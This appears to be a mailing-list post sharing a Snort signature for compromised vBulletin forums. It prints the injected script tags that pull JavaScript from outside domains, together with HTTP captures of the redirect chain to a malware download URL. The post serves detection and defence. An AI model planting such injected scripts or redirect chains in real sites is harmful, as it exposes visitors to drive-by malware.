Snort mailing list archives
Compromised vBulletin sig
From: James Lay <jlay () slave-tothe-box net>
Date: Thu, 16 Apr 2015 11:30:58 -0600
Didn't see this in any current ruleset, so I thought I'd post it here. Yesterday I saw two of these. Injected into the vBulletin initial page: <script type="text/javascript" src="meow://meh[.]com/misc.php?v=364&js=js"></script> <script type="text/javascript" src="meow://bleh[.]com/forums/misc.php?v=420&js=js"></script> ####################################################################################### GET /misc.php?v=364&js=js HTTP/1.1 Accept: application/javascript, */*;q=0.8 Referer: meow://meh[.]com/general-cooking/72226-kool-aid-bulk-purchases.html Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: meh.com Cookie: __cfduid=bleh; bbsessionhash=bleh; bblastvisit=1429113507; bblastactivity=0 Cache-Control: max-stale=0 Connection: Keep-Alive Pragma: no-cache HTTP/1.1 200 OK Date: Wed, 15 Apr 2015 15:58:25 GMT Content-Type: text/html; charset=ISO-8859-1 Transfer-Encoding: chunked Connection: keep-alive Expires: 0 Cache-Control: private, post-check=0, pre-check=0, max-age=0 Pragma: no-cache Set-Cookie: bblastactivity=0; expires=Thu, 14-Apr-2016 15:58:27 GMT; path=/ Set-Cookie: bblang_id=en; expires=Thu, 16-Apr-2015 01:58:27 GMT X-Powered-By: PleskLin Server: cloudflare-nginx CF-RAY: 1d78da121f59012e-SJC Content-Encoding: gzip document.location='meow://filestore72[.]info/download.php?id=f823cc00' ####################################################################################### This in turn goes to: ####################################################################################### GET /download.php?id=f823cc00 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Referer: meow://meh[.]com/general-cooking/72226-kool-aid-bulk-purchases.html Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: filestore72[.]info Cache-Control: max-stale=0 Connection: Keep-Alive Pragma: no-cache HTTP/1.1 302 Moved Temporarily Server: nginx/1.0.12 Date: Wed, 15 Apr 2015 15:53:40 GMT Content-Type: text/html Content-Length: 161 Connection: close Location: meow://pdta23sj9kkdl9wwtakzzhf.antalyagunlukkiralik[.]org/index.php?z=Z2xham91PWtuY2h2JnRpbWU9MTUwNDE1MTU0NTI1ODI3MDI4MSZzcmM9NzYmc3VybD1maWxlc3RvcmU3Mi5pbmZvJnNwb3J0PTgwJmtleT0yN0ExMzA0MSZzdXJpPS9kb3dubG9hZC5waHAlM2ZpZD1mODIzY2MwMA== <html> <head><title>302 Found</title></head> <body bgcolor="white"> <center><h1>302 Found</h1></center> <hr><center>nginx/1.0.12</center> </body> </html> ####################################################################################### Seems to be old-ish news, but the sig is below: alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"SERVER-WEBAPP Compromised vbulletin site"; flow:established,to_server; uricontent:"/misc.php?"; uricontent:"v="; uricontent:"js=js"; pcre:"/misc.php\x3Fv\x3D[0-9]{3}\x26js\x3Djs/Ui"; reference:url,http://www.vbulletin.com/forum/forum/vbulletin-4/vbulletin-4-questions-problems-and-troubleshooting/4020207-please-help-hacked-vbulletin-redirect-to-filestore72-info; classtype:bad-unknown; sid:10000156; rev:1;) As usual, not sure if I have this perfect so anything to improve this sig would be excellent. Thank you. James ------------------------------------------------------------------------------ BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT Develop your own process in accordance with the BPMN 2 standard Learn Process modeling best practices with Bonita BPM through live exercises http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual- event?utm_ source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF _______________________________________________ Snort-sigs mailing list Snort-sigs () lists sourceforge net https://lists.sourceforge.net/lists/listinfo/snort-sigs http://www.snort.org Please visit http://blog.snort.org for the latest news about Snort!
Current thread:
- Compromised vBulletin sig James Lay (Apr 16)
- Re: Compromised vBulletin sig Matt Mickel (May 04)